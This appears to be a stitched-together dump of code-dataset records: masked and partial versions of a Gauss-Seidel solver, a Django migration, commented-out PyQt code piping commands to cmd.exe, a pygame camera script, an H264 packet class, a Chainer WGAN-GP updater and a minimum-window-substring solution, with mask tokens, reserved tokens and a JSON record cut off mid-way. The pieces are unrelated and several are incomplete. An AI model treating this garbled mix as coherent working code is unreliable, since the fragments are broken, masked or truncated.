"step-2": "<mask token>\n\n\ndef gauss_seidel(relax, est, stop):\n \"\"\"\n Método iterativo de Gauss-Seidel para o sistema linear do trabalho.\n Onde relax é o fator de relaxação, est é o valor inicial, stop é o\n critério de parada, n é a quantidade de linhas do sistema e k é o\n número de iterações.\n \"\"\"\n k = 0\n dif = 10000\n n = len(est)\n diff = np.zeros(n)\n while dif > stop:\n k += 1\n est[0] = (1 - relax) * est[0] + relax * (1.5 - est[1])\n for i in range(1, int(n / 2)):\n est[i] = (1 - relax) * est[i] + relax * ((1.0 - est[i - 1] -\n est[i + 1] - est[i + 25]) / 4)\n for j in range(int(n / 2), n - 1):\n est[j] = (1 - relax) * est[j] + relax * ((2.0 - est[j - 25] -\n est[j - 1] - est[j + 1]) / 5)\n est[n - 1] = (1 - relax) * est[n - 1] + relax * (3.0 - est[n - 2])\n dif = max(abs(np.subtract(est, diff)))\n diff = np.copy(est)\n return [est, k]\n",
"step-3": "import numpy as np\n\n\ndef gauss_seidel(relax, est, stop):\n \"\"\"\n Método iterativo de Gauss-Seidel para o sistema linear do trabalho.\n Onde relax é o fator de relaxação, est é o valor inicial, stop é o\n critério de parada, n é a quantidade de linhas do sistema e k é o\n número de iterações.\n \"\"\"\n k = 0\n dif = 10000\n n = len(est)\n diff = np.zeros(n)\n while dif > stop:\n k += 1\n est[0] = (1 - relax) * est[0] + relax * (1.5 - est[1])\n for i in range(1, int(n / 2)):\n est[i] = (1 - relax) * est[i] + relax * ((1.0 - est[i - 1] -\n est[i + 1] - est[i + 25]) / 4)\n for j in range(int(n / 2), n - 1):\n est[j] = (1 - relax) * est[j] + relax * ((2.0 - est[j - 25] -\n est[j - 1] - est[j + 1]) / 5)\n est[n - 1] = (1 - relax) * est[n - 1] + relax * (3.0 - est[n - 2])\n dif = max(abs(np.subtract(est, diff)))\n diff = np.copy(est)\n return [est, k]\n",
"step-4": "# -*- coding: utf-8 -*-\nimport numpy as np\n\n\ndef gauss_seidel(relax, est, stop):\n \"\"\"\n Método iterativo de Gauss-Seidel para o sistema linear do trabalho.\n Onde relax é o fator de relaxação, est é o valor inicial, stop é o\n critério de parada, n é a quantidade de linhas do sistema e k é o\n número de iterações.\n \"\"\"\n\n k = 0\n dif = 10000\n n = len(est)\n diff = np.zeros(n)\n\n while dif > stop:\n k += 1\n\n est[0] = ((1 - relax) * est[0]) + relax * (1.50 - est[1])\n\n for i in range(1, int(n/2)):\n est[i] = ((1 - relax) * est[i]) + relax * \\\n ((1.0 - est[i-1] - est[i+1] - est[i+25])/4)\n\n for j in range(int(n/2), n-1):\n est[j] = ((1 - relax) * est[j]) + relax * \\\n ((2.0 - est[j-25] - est[j-1] - est[j+1])/5)\n\n est[n-1] = ((1 - relax) * est[n-1]) + relax * (3.00 - est[n-2])\n\n dif = max(abs(np.subtract(est, diff)))\n diff = np.copy(est)\n\n return [est, k]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [migrations.CreateModel(name='Participant', fields=[(
'username', models.CharField(max_length=25, primary_key=True,
serialize=False)), ('phone_num', models.CharField(default='',
max_length=16)), ('password', models.CharField(max_length=16)), (
'register_datetime', models.BigIntegerField(blank=True, default=
1559382976.184129)), ('last_login_datetime', models.BigIntegerField
(blank=True, default=1559382976.184129)), ('heartbeat_smartwatch',
models.BigIntegerField(blank=True, default=1559382976.184129)), (
'heartbeat_smartphone', models.BigIntegerField(blank=True, default=
1559382976.184129))])]
<|reserved_special_token_1|>
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [migrations.CreateModel(name='Participant', fields=[(
'username', models.CharField(max_length=25, primary_key=True,
serialize=False)), ('phone_num', models.CharField(default='',
max_length=16)), ('password', models.CharField(max_length=16)), (
'register_datetime', models.BigIntegerField(blank=True, default=
1559382976.184129)), ('last_login_datetime', models.BigIntegerField
(blank=True, default=1559382976.184129)), ('heartbeat_smartwatch',
models.BigIntegerField(blank=True, default=1559382976.184129)), (
'heartbeat_smartphone', models.BigIntegerField(blank=True, default=
1559382976.184129))])]
<|reserved_special_token_1|>
# Generated by Django 2.2.1 on 2019-06-01 09:56
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Participant',
fields=[
('username', models.CharField(max_length=25, primary_key=True, serialize=False)),
('phone_num', models.CharField(default='', max_length=16)),
('password', models.CharField(max_length=16)),
('register_datetime', models.BigIntegerField(blank=True, default=1559382976.184129)),
('last_login_datetime', models.BigIntegerField(blank=True, default=1559382976.184129)),
('heartbeat_smartwatch', models.BigIntegerField(blank=True, default=1559382976.184129)),
('heartbeat_smartphone', models.BigIntegerField(blank=True, default=1559382976.184129)),
],
),
]
|
flexible
|
{
"blob_id": "58b12418a2a6b1ef9b63800b89e7f0b9fffd908c",
"index": 9223,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='Participant', fields=[(\n 'username', models.CharField(max_length=25, primary_key=True,\n serialize=False)), ('phone_num', models.CharField(default='',\n max_length=16)), ('password', models.CharField(max_length=16)), (\n 'register_datetime', models.BigIntegerField(blank=True, default=\n 1559382976.184129)), ('last_login_datetime', models.BigIntegerField\n (blank=True, default=1559382976.184129)), ('heartbeat_smartwatch',\n models.BigIntegerField(blank=True, default=1559382976.184129)), (\n 'heartbeat_smartphone', models.BigIntegerField(blank=True, default=\n 1559382976.184129))])]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='Participant', fields=[(\n 'username', models.CharField(max_length=25, primary_key=True,\n serialize=False)), ('phone_num', models.CharField(default='',\n max_length=16)), ('password', models.CharField(max_length=16)), (\n 'register_datetime', models.BigIntegerField(blank=True, default=\n 1559382976.184129)), ('last_login_datetime', models.BigIntegerField\n (blank=True, default=1559382976.184129)), ('heartbeat_smartwatch',\n models.BigIntegerField(blank=True, default=1559382976.184129)), (\n 'heartbeat_smartphone', models.BigIntegerField(blank=True, default=\n 1559382976.184129))])]\n",
"step-5": "# Generated by Django 2.2.1 on 2019-06-01 09:56\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Participant',\n fields=[\n ('username', models.CharField(max_length=25, primary_key=True, serialize=False)),\n ('phone_num', models.CharField(default='', max_length=16)),\n ('password', models.CharField(max_length=16)),\n ('register_datetime', models.BigIntegerField(blank=True, default=1559382976.184129)),\n ('last_login_datetime', models.BigIntegerField(blank=True, default=1559382976.184129)),\n ('heartbeat_smartwatch', models.BigIntegerField(blank=True, default=1559382976.184129)),\n ('heartbeat_smartphone', models.BigIntegerField(blank=True, default=1559382976.184129)),\n ],\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# ""
# "deb_char_cont_x9875"
# # def watch_edit_text(self): # execute when test edited
# # logging.info("TQ : " + str(len(self.te_sql_cmd.toPlainText())))
# # logging.info("TE : " + str(len(self.cmd_last_text)))
# # logging.info("LEN : " + str(self.cmd_len))
# # if len(self.te_sql_cmd.toPlainText()) < self.cmd_len or \
# # self.te_sql_cmd.toPlainText().find(self.cmd_last_text) != 0:
# # # self.te_sql_cmd.setText(self.cmd_last_text) # not writch text
# #
# # # self.te_sql_cmd.setText(self.cmd_last_text) # Work but no text highLight
# # # after press backspace
# # # self.te_sql_cmd.setDocument(self.cmd_last_text_document)
# #
# # self.te_sql_cmd.setHtml(self.cmd_last_html_text)
# #
# # logging.info("TQ : " + str(len(self.te_sql_cmd.toPlainText())))
# # logging.info("TE : " + str(len(self.cmd_last_text)))
# #
# # tempCurs = self.te_sql_cmd.textCursor()
# # # tempCurs=QTextCursor()
# # # tempCurs.movePosition(QTextCursor.Right,QTextCursor.MoveAnchor,len(self.te_sql_cmd.toPlainText()))
# #
# # tempCurs.movePosition(QTextCursor.End, QTextCursor.MoveAnchor, 0)
# # self.te_sql_cmd.setTextCursor(tempCurs)
#
#
# #
# # import subprocess
# # proc = subprocess.Popen('cmd.exe', stdin = subprocess.PIPE, stdout = subprocess.PIPE)
# #
#
# app=QApplication(sys.argv)
# window=AbtTerminal()
#
# def my_commands_ana(command):
# if command == "cd":
# # return str(os.path.dirname(os.path.realpath(__file__))) # current file Directory
# return os.getcwd()
# if "cd" in command[:2] and len(command) > 2:
# dir_name = command[3:]
# try:
# os.chdir(dir_name)
# return '<h4>dir changed to</h4> <h4 style="color:rgb(0,230,120);">%s</h4>' % os.getcwd()
# except:
# return '<h4 style="color:red">Cant change current Directory To \n\t%s</h4>' % dir_name
# if "$$" in command[:2]:
# stdout, stderr = proc.communicate(bytes(str(command[2:]), 'UTF-8'))
# deleted_length_before=len("b'Microsoft Windows [Version 10.0.10586]\r\n(c) 2015 Microsoft Corporation. All rights reserved.\r\n\r\n")
# deleted_length_after=len(">More? '")
# # real_result=str(stdout)[deleted_length_before+4:len(str(stdout))-deleted_length_after]
# real_result=str(stdout.decode("utf-8")).replace("Microsoft Windows [Version 10.0.10586]\r\n(c) 2015 Microsoft Corporation. All rights reserved.\r\n\r\n","")
# real_result=real_result.replace(">More?","")
# print(real_result)
# return real_result
#
#
#
#
#
# ###############
# import subprocess
# cmdline = ["cmd", "/q", "/k", "echo off"]
# cmd = subprocess.Popen(cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
#
#
# if "$$" in command[:2]:
# batch = b"""\
# cd
# """
#
# # cmd.stdin.write(bytes(str(command[2:]), 'UTF-8'))
#
# cmd.stdin.write(batch)
# cmd.stdin.flush() # Must include this to ensure data is passed to child process
# result = cmd.stdout.read()
# return " "
|
normal
|
{
"blob_id": "f70f4f093aa64b8cd60acbb846855ca3fed13c63",
"index": 4837,
"step-1": "# \"\"\n# \"deb_char_cont_x9875\"\n# # def watch_edit_text(self): # execute when test edited\n# # logging.info(\"TQ : \" + str(len(self.te_sql_cmd.toPlainText())))\n# # logging.info(\"TE : \" + str(len(self.cmd_last_text)))\n# # logging.info(\"LEN : \" + str(self.cmd_len))\n# # if len(self.te_sql_cmd.toPlainText()) < self.cmd_len or \\\n# # self.te_sql_cmd.toPlainText().find(self.cmd_last_text) != 0:\n# # # self.te_sql_cmd.setText(self.cmd_last_text) # not writch text\n# #\n# # # self.te_sql_cmd.setText(self.cmd_last_text) # Work but no text highLight\n# # # after press backspace\n# # # self.te_sql_cmd.setDocument(self.cmd_last_text_document)\n# #\n# # self.te_sql_cmd.setHtml(self.cmd_last_html_text)\n# #\n# # logging.info(\"TQ : \" + str(len(self.te_sql_cmd.toPlainText())))\n# # logging.info(\"TE : \" + str(len(self.cmd_last_text)))\n# #\n# # tempCurs = self.te_sql_cmd.textCursor()\n# # # tempCurs=QTextCursor()\n# # # tempCurs.movePosition(QTextCursor.Right,QTextCursor.MoveAnchor,len(self.te_sql_cmd.toPlainText()))\n# #\n# # tempCurs.movePosition(QTextCursor.End, QTextCursor.MoveAnchor, 0)\n# # self.te_sql_cmd.setTextCursor(tempCurs)\n#\n#\n# #\n# # import subprocess\n# # proc = subprocess.Popen('cmd.exe', stdin = subprocess.PIPE, stdout = subprocess.PIPE)\n# #\n#\n# app=QApplication(sys.argv)\n# window=AbtTerminal()\n#\n# def my_commands_ana(command):\n# if command == \"cd\":\n# # return str(os.path.dirname(os.path.realpath(__file__))) # current file Directory\n# return os.getcwd()\n# if \"cd\" in command[:2] and len(command) > 2:\n# dir_name = command[3:]\n# try:\n# os.chdir(dir_name)\n# return '<h4>dir changed to</h4> <h4 style=\"color:rgb(0,230,120);\">%s</h4>' % os.getcwd()\n# except:\n# return '<h4 style=\"color:red\">Cant change current Directory To \\n\\t%s</h4>' % dir_name\n# if \"$$\" in command[:2]:\n# stdout, stderr = proc.communicate(bytes(str(command[2:]), 'UTF-8'))\n# deleted_length_before=len(\"b'Microsoft Windows [Version 10.0.10586]\\r\\n(c) 2015 Microsoft Corporation. All rights reserved.\\r\\n\\r\\n\")\n# deleted_length_after=len(\">More? '\")\n# # real_result=str(stdout)[deleted_length_before+4:len(str(stdout))-deleted_length_after]\n# real_result=str(stdout.decode(\"utf-8\")).replace(\"Microsoft Windows [Version 10.0.10586]\\r\\n(c) 2015 Microsoft Corporation. All rights reserved.\\r\\n\\r\\n\",\"\")\n# real_result=real_result.replace(\">More?\",\"\")\n# print(real_result)\n# return real_result\n#\n#\n#\n#\n#\n# ###############\n# import subprocess\n# cmdline = [\"cmd\", \"/q\", \"/k\", \"echo off\"]\n# cmd = subprocess.Popen(cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n#\n#\n# if \"$$\" in command[:2]:\n# batch = b\"\"\"\\\n# cd\n# \"\"\"\n#\n# # cmd.stdin.write(bytes(str(command[2:]), 'UTF-8'))\n#\n# cmd.stdin.write(batch)\n# cmd.stdin.flush() # Must include this to ensure data is passed to child process\n# result = cmd.stdout.read()\n# return \" \"\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
1
]
}
|
[
1
] |
import sys
import pygame
import pygame.camera
from pygame.locals import *
from PIL import Image
pygame.init()
pygame.camera.init()
camlist = pygame.camera.list_cameras()
print(camlist)
# images = map(Image.open, ['Test1.jpg', 'Test2.jpg', 'Test3.jpg'])
# widths, heights = zip(*(i.size for i in images))
# total_width = sum(widths)
# max_height = max(heights)
# new_im = Image.new('RGB', (total_width, max_height))
# x_offset = 0
# for im in images:
# new_im.paste(im, (x_offset,0))
# x_offset += im.size[0]
# new_im.save('test.jpg')
|
normal
|
{
"blob_id": "aae280e049c00e70e2214662a07eee8bfa29227e",
"index": 6632,
"step-1": "<mask token>\n",
"step-2": "<mask token>\npygame.init()\npygame.camera.init()\n<mask token>\nprint(camlist)\n",
"step-3": "<mask token>\npygame.init()\npygame.camera.init()\ncamlist = pygame.camera.list_cameras()\nprint(camlist)\n",
"step-4": "import sys\nimport pygame\nimport pygame.camera\nfrom pygame.locals import *\nfrom PIL import Image\npygame.init()\npygame.camera.init()\ncamlist = pygame.camera.list_cameras()\nprint(camlist)\n",
"step-5": "import sys\nimport pygame\nimport pygame.camera\nfrom pygame.locals import *\nfrom PIL import Image\n\n\npygame.init()\npygame.camera.init()\n\ncamlist = pygame.camera.list_cameras()\n\nprint(camlist)\n\n# images = map(Image.open, ['Test1.jpg', 'Test2.jpg', 'Test3.jpg'])\n# widths, heights = zip(*(i.size for i in images))\n\n# total_width = sum(widths)\n# max_height = max(heights)\n\n# new_im = Image.new('RGB', (total_width, max_height))\n\n# x_offset = 0\n# for im in images:\n# new_im.paste(im, (x_offset,0))\n# x_offset += im.size[0]\n\n# new_im.save('test.jpg')",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import struct
class H264Packet:
UNKNOWN_TYPE, I_HDR, P_HDR, B_HDR, I_DATA, P_DATA, B_DATA = range(7)
def __init__(self, packet):
self.packet = packet
self.type = None
self.data = None
if len(packet) > 3:
(self.type,) = struct.unpack('H', packet[0:2])
self.data = packet[2:]
def serialize(self):
return self.packet
def type(self):
return self.type
def data(self):
return self.data
|
normal
|
{
"blob_id": "ff1db5981a0163df1dfb44869a3d4af2be03c10a",
"index": 2745,
"step-1": "<mask token>\n\n\nclass H264Packet:\n <mask token>\n\n def __init__(self, packet):\n self.packet = packet\n self.type = None\n self.data = None\n if len(packet) > 3:\n self.type, = struct.unpack('H', packet[0:2])\n self.data = packet[2:]\n\n def serialize(self):\n return self.packet\n <mask token>\n\n def data(self):\n return self.data\n",
"step-2": "<mask token>\n\n\nclass H264Packet:\n <mask token>\n\n def __init__(self, packet):\n self.packet = packet\n self.type = None\n self.data = None\n if len(packet) > 3:\n self.type, = struct.unpack('H', packet[0:2])\n self.data = packet[2:]\n\n def serialize(self):\n return self.packet\n\n def type(self):\n return self.type\n\n def data(self):\n return self.data\n",
"step-3": "<mask token>\n\n\nclass H264Packet:\n UNKNOWN_TYPE, I_HDR, P_HDR, B_HDR, I_DATA, P_DATA, B_DATA = range(7)\n\n def __init__(self, packet):\n self.packet = packet\n self.type = None\n self.data = None\n if len(packet) > 3:\n self.type, = struct.unpack('H', packet[0:2])\n self.data = packet[2:]\n\n def serialize(self):\n return self.packet\n\n def type(self):\n return self.type\n\n def data(self):\n return self.data\n",
"step-4": "import struct\n\n\nclass H264Packet:\n UNKNOWN_TYPE, I_HDR, P_HDR, B_HDR, I_DATA, P_DATA, B_DATA = range(7)\n\n def __init__(self, packet):\n self.packet = packet\n self.type = None\n self.data = None\n if len(packet) > 3:\n self.type, = struct.unpack('H', packet[0:2])\n self.data = packet[2:]\n\n def serialize(self):\n return self.packet\n\n def type(self):\n return self.type\n\n def data(self):\n return self.data\n",
"step-5": "import struct\n\n\nclass H264Packet:\n\tUNKNOWN_TYPE, I_HDR, P_HDR, B_HDR, I_DATA, P_DATA, B_DATA = range(7)\n\n\tdef __init__(self, packet):\n\t\tself.packet = packet\n\t\tself.type = None\n\t\tself.data = None\n\t\tif len(packet) > 3:\n\t\t\t(self.type,) = struct.unpack('H', packet[0:2])\n\t\t\tself.data = packet[2:]\n\t\n\tdef serialize(self):\n\t\treturn self.packet \n\t\t\n\tdef type(self):\n\t\treturn self.type\n\t\n\tdef data(self):\n\t\treturn self.data",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
#!/usr/bin/python3
#https://github.com/pfnet-research/chainer-gan-lib/blob/master/wgan_gp/updater.py
import numpy as np
import chainer
import chainer.functions as F
from chainer import Variable
from chainer.dataset import convert
class WGANUpdater(chainer.training.updaters.StandardUpdater):
def __init__(self, *args, **kwargs):
self.gen, self.dis = kwargs.pop('models')
self.n_dis = kwargs.pop('n_dis')
self.lam = kwargs.pop('lam')
self.iteration = 0
super(WGANUpdater, self).__init__(*args, **kwargs)
def loss_gen(self, gen, y_fake):
batchsize = len(y_fake)
loss = F.sum(-y_fake)/batchsize
chainer.reporter.report({'loss': loss}, gen)
return loss
def loss_dis(self, dis, y_real, y_fake, x_real, x_fake):
batchsize = len(y_fake)
xp = dis.xp
eps = xp.random.uniform(0, 1, size=batchsize)\
.astype("f")[:, None, None, None]
x_mid = eps * x_real + (1.0 - eps) * x_fake
y_mid,_ = self.dis(x_mid)
grad, = chainer.grad([y_mid], [x_mid], enable_double_backprop=True)
grad = F.sqrt(F.batch_l2_norm_squared(grad))
loss_grad = self.lam * F.mean_squared_error(grad,
xp.ones_like(grad.data))
loss = F.sum(-y_real) / batchsize
loss += F.sum(y_fake) / batchsize
wasserstein_distance = -loss
loss += loss_grad
chainer.reporter.report({'wasserstein_distance': wasserstein_distance,
'loss_grad':loss_grad})
chainer.reporter.report({'loss': loss}, dis)
return loss
def update_core(self):
gen_optimizer = self.get_optimizer('gen')
dis_optimizer = self.get_optimizer('dis')
xp = self.gen.xp
for i in range(self.n_dis):
batch = self.get_iterator('main').next()
batchsize = len(batch)
x = []
for j in range(batchsize):
x.append(np.asarray(batch[j]).astype("f"))
x_real = Variable(xp.asarray(x))
y_real,_ = self.dis(x_real)
z = Variable(xp.asarray(self.gen.make_hidden(batchsize)))
x_fake = self.gen(z)
y_fake,_ = self.dis(x_fake)
if i == 0:
gen_optimizer.update(self.loss_gen, self.gen, y_fake)
x_fake.unchain_backward()
dis_optimizer.update(self.loss_dis, self.dis,
y_real, y_fake, x_real, x_fake)
|
normal
|
{
"blob_id": "a7099b2506de08893ca849146813505d88784895",
"index": 2402,
"step-1": "<mask token>\n\n\nclass WGANUpdater(chainer.training.updaters.StandardUpdater):\n\n def __init__(self, *args, **kwargs):\n self.gen, self.dis = kwargs.pop('models')\n self.n_dis = kwargs.pop('n_dis')\n self.lam = kwargs.pop('lam')\n self.iteration = 0\n super(WGANUpdater, self).__init__(*args, **kwargs)\n\n def loss_gen(self, gen, y_fake):\n batchsize = len(y_fake)\n loss = F.sum(-y_fake) / batchsize\n chainer.reporter.report({'loss': loss}, gen)\n return loss\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass WGANUpdater(chainer.training.updaters.StandardUpdater):\n\n def __init__(self, *args, **kwargs):\n self.gen, self.dis = kwargs.pop('models')\n self.n_dis = kwargs.pop('n_dis')\n self.lam = kwargs.pop('lam')\n self.iteration = 0\n super(WGANUpdater, self).__init__(*args, **kwargs)\n\n def loss_gen(self, gen, y_fake):\n batchsize = len(y_fake)\n loss = F.sum(-y_fake) / batchsize\n chainer.reporter.report({'loss': loss}, gen)\n return loss\n\n def loss_dis(self, dis, y_real, y_fake, x_real, x_fake):\n batchsize = len(y_fake)\n xp = dis.xp\n eps = xp.random.uniform(0, 1, size=batchsize).astype('f')[:, None,\n None, None]\n x_mid = eps * x_real + (1.0 - eps) * x_fake\n y_mid, _ = self.dis(x_mid)\n grad, = chainer.grad([y_mid], [x_mid], enable_double_backprop=True)\n grad = F.sqrt(F.batch_l2_norm_squared(grad))\n loss_grad = self.lam * F.mean_squared_error(grad, xp.ones_like(grad\n .data))\n loss = F.sum(-y_real) / batchsize\n loss += F.sum(y_fake) / batchsize\n wasserstein_distance = -loss\n loss += loss_grad\n chainer.reporter.report({'wasserstein_distance':\n wasserstein_distance, 'loss_grad': loss_grad})\n chainer.reporter.report({'loss': loss}, dis)\n return loss\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass WGANUpdater(chainer.training.updaters.StandardUpdater):\n\n def __init__(self, *args, **kwargs):\n self.gen, self.dis = kwargs.pop('models')\n self.n_dis = kwargs.pop('n_dis')\n self.lam = kwargs.pop('lam')\n self.iteration = 0\n super(WGANUpdater, self).__init__(*args, **kwargs)\n\n def loss_gen(self, gen, y_fake):\n batchsize = len(y_fake)\n loss = F.sum(-y_fake) / batchsize\n chainer.reporter.report({'loss': loss}, gen)\n return loss\n\n def loss_dis(self, dis, y_real, y_fake, x_real, x_fake):\n batchsize = len(y_fake)\n xp = dis.xp\n eps = xp.random.uniform(0, 1, size=batchsize).astype('f')[:, None,\n None, None]\n x_mid = eps * x_real + (1.0 - eps) * x_fake\n y_mid, _ = self.dis(x_mid)\n grad, = chainer.grad([y_mid], [x_mid], enable_double_backprop=True)\n grad = F.sqrt(F.batch_l2_norm_squared(grad))\n loss_grad = self.lam * F.mean_squared_error(grad, xp.ones_like(grad\n .data))\n loss = F.sum(-y_real) / batchsize\n loss += F.sum(y_fake) / batchsize\n wasserstein_distance = -loss\n loss += loss_grad\n chainer.reporter.report({'wasserstein_distance':\n wasserstein_distance, 'loss_grad': loss_grad})\n chainer.reporter.report({'loss': loss}, dis)\n return loss\n\n def update_core(self):\n gen_optimizer = self.get_optimizer('gen')\n dis_optimizer = self.get_optimizer('dis')\n xp = self.gen.xp\n for i in range(self.n_dis):\n batch = self.get_iterator('main').next()\n batchsize = len(batch)\n x = []\n for j in range(batchsize):\n x.append(np.asarray(batch[j]).astype('f'))\n x_real = Variable(xp.asarray(x))\n y_real, _ = self.dis(x_real)\n z = Variable(xp.asarray(self.gen.make_hidden(batchsize)))\n x_fake = self.gen(z)\n y_fake, _ = self.dis(x_fake)\n if i == 0:\n gen_optimizer.update(self.loss_gen, self.gen, y_fake)\n x_fake.unchain_backward()\n dis_optimizer.update(self.loss_dis, self.dis, y_real, y_fake,\n x_real, x_fake)\n",
"step-4": "import numpy as np\nimport chainer\nimport chainer.functions as F\nfrom chainer import Variable\nfrom chainer.dataset import convert\n\n\nclass WGANUpdater(chainer.training.updaters.StandardUpdater):\n\n def __init__(self, *args, **kwargs):\n self.gen, self.dis = kwargs.pop('models')\n self.n_dis = kwargs.pop('n_dis')\n self.lam = kwargs.pop('lam')\n self.iteration = 0\n super(WGANUpdater, self).__init__(*args, **kwargs)\n\n def loss_gen(self, gen, y_fake):\n batchsize = len(y_fake)\n loss = F.sum(-y_fake) / batchsize\n chainer.reporter.report({'loss': loss}, gen)\n return loss\n\n def loss_dis(self, dis, y_real, y_fake, x_real, x_fake):\n batchsize = len(y_fake)\n xp = dis.xp\n eps = xp.random.uniform(0, 1, size=batchsize).astype('f')[:, None,\n None, None]\n x_mid = eps * x_real + (1.0 - eps) * x_fake\n y_mid, _ = self.dis(x_mid)\n grad, = chainer.grad([y_mid], [x_mid], enable_double_backprop=True)\n grad = F.sqrt(F.batch_l2_norm_squared(grad))\n loss_grad = self.lam * F.mean_squared_error(grad, xp.ones_like(grad\n .data))\n loss = F.sum(-y_real) / batchsize\n loss += F.sum(y_fake) / batchsize\n wasserstein_distance = -loss\n loss += loss_grad\n chainer.reporter.report({'wasserstein_distance':\n wasserstein_distance, 'loss_grad': loss_grad})\n chainer.reporter.report({'loss': loss}, dis)\n return loss\n\n def update_core(self):\n gen_optimizer = self.get_optimizer('gen')\n dis_optimizer = self.get_optimizer('dis')\n xp = self.gen.xp\n for i in range(self.n_dis):\n batch = self.get_iterator('main').next()\n batchsize = len(batch)\n x = []\n for j in range(batchsize):\n x.append(np.asarray(batch[j]).astype('f'))\n x_real = Variable(xp.asarray(x))\n y_real, _ = self.dis(x_real)\n z = Variable(xp.asarray(self.gen.make_hidden(batchsize)))\n x_fake = self.gen(z)\n y_fake, _ = self.dis(x_fake)\n if i == 0:\n gen_optimizer.update(self.loss_gen, self.gen, y_fake)\n x_fake.unchain_backward()\n dis_optimizer.update(self.loss_dis, self.dis, y_real, y_fake,\n x_real, x_fake)\n",
"step-5": "#!/usr/bin/python3\n#https://github.com/pfnet-research/chainer-gan-lib/blob/master/wgan_gp/updater.py\n\nimport numpy as np\nimport chainer\nimport chainer.functions as F\nfrom chainer import Variable\nfrom chainer.dataset import convert\n\nclass WGANUpdater(chainer.training.updaters.StandardUpdater):\n\n def __init__(self, *args, **kwargs):\n self.gen, self.dis = kwargs.pop('models')\n self.n_dis = kwargs.pop('n_dis')\n self.lam = kwargs.pop('lam')\n self.iteration = 0\n super(WGANUpdater, self).__init__(*args, **kwargs)\n\n def loss_gen(self, gen, y_fake):\n batchsize = len(y_fake)\n loss = F.sum(-y_fake)/batchsize\n chainer.reporter.report({'loss': loss}, gen)\n return loss\n def loss_dis(self, dis, y_real, y_fake, x_real, x_fake):\n batchsize = len(y_fake)\n xp = dis.xp\n\n eps = xp.random.uniform(0, 1, size=batchsize)\\\n .astype(\"f\")[:, None, None, None]\n x_mid = eps * x_real + (1.0 - eps) * x_fake\n\n y_mid,_ = self.dis(x_mid)\n grad, = chainer.grad([y_mid], [x_mid], enable_double_backprop=True)\n grad = F.sqrt(F.batch_l2_norm_squared(grad))\n loss_grad = self.lam * F.mean_squared_error(grad, \n xp.ones_like(grad.data))\n\n loss = F.sum(-y_real) / batchsize\n loss += F.sum(y_fake) / batchsize\n wasserstein_distance = -loss\n loss += loss_grad\n chainer.reporter.report({'wasserstein_distance': wasserstein_distance,\n 'loss_grad':loss_grad})\n chainer.reporter.report({'loss': loss}, dis)\n return loss\n\n def update_core(self):\n gen_optimizer = self.get_optimizer('gen')\n dis_optimizer = self.get_optimizer('dis')\n xp = self.gen.xp\n\n for i in range(self.n_dis):\n batch = self.get_iterator('main').next()\n batchsize = len(batch)\n x = []\n for j in range(batchsize):\n x.append(np.asarray(batch[j]).astype(\"f\"))\n x_real = Variable(xp.asarray(x))\n y_real,_ = self.dis(x_real)\n\n z = Variable(xp.asarray(self.gen.make_hidden(batchsize)))\n x_fake = self.gen(z)\n y_fake,_ = self.dis(x_fake)\n\n if i == 0:\n gen_optimizer.update(self.loss_gen, self.gen, y_fake)\n x_fake.unchain_backward()\n\n dis_optimizer.update(self.loss_dis, self.dis, \n y_real, y_fake, x_real, x_fake)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
def minWindow(self, s: str, t: str) ->str:
char_cnt = {}
for character in t:
if character not in char_cnt:
char_cnt[character] = 1
else:
char_cnt[character] += 1
dq = []
min_substring = None
for i in range(len(s)):
if s[i] in t:
char_cnt[s[i]] -= 1
dq.append((i, s[i]))
while len(dq) > 0 and char_cnt[dq[0][1]] < 0:
char_cnt[dq[0][1]] += 1
del dq[0]
containAll = True
for char in char_cnt:
if char_cnt[char] > 0:
containAll = False
break
if containAll:
substring = s[dq[0][0]:dq[-1][0] + 1]
if min_substring is None or len(substring) < len(
min_substring):
min_substring = substring
return min_substring if min_substring else ''
<|reserved_special_token_1|>
class Solution:
def minWindow(self, s: str, t: str) -> str:
char_cnt = {}
for character in t:
if character not in char_cnt:
char_cnt[character] = 1
else:
char_cnt[character] += 1
dq = [] # add index & character
min_substring = None
for i in range(len(s)):
if s[i] in t:
char_cnt[s[i]] -= 1
dq.append((i, s[i]))
while len(dq) > 0 and char_cnt[dq[0][1]] < 0:
char_cnt[dq[0][1]] += 1
del dq[0]
containAll = True
for char in char_cnt:
if char_cnt[char] > 0:
containAll = False
break
if containAll:
substring = s[dq[0][0]:dq[-1][0]+1]
if min_substring is None or len(substring) < len(min_substring):
min_substring = substring
return min_substring if min_substring else ""
|
flexible
|
{
"blob_id": "22706d7d9c04bb660c9bf0df66de89ed6bd480c2",
"index": 8210,
"step-1": "<mask token>\n",
